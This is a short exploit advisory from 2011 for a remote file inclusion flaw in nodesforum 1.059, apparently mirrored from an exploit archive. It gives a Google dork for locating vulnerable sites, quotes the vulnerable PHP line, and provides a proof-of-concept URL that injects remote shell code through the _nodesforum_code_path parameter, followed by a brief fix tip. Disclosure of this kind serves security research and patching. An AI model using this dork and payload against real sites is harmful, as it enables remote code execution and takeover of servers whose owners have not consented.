nodesforum 1.059 – Remote File Inclusion

  • 作者: bd0rk
    日期: 2011-06-23
  • 类别:
  • 来源:
  • # Exploit Title: nodesforum 1.059 Remote File Inclusion Vulnerability
    # Google Dork: inurl: powered by Nodesforum
    # Date: 6/23/2011
    # Author: bd0rk ( bd0rk[at] )
    # Software-Download:
    # Tested on: Ubuntu-Linux / WinVista
    Vulnerable Code in 3rd_party_limits.php line 6 - 8
    if(@filemtime($limits_cache_url) && @filemtime($limits_cache_url)>(time()-(24*3600*14)))
    The parameter $limits_cache_url is declared with the other parameter $_nodesforum_code_path
    So we can use the declared.
    PoC: http://[target_host]/nodesforum/3rd_party_limits.php?_nodesforum_code_path=[RemoteShellCode]
    Fixtip: Declare $_nodesforum_code_path, likewise!
    Greetings: Kathrin J., Perle, x0r_32 and ZUBAIR ANJUM ;-)
    #### The 22 years old, german Hacker bd0rk #### <---white-hat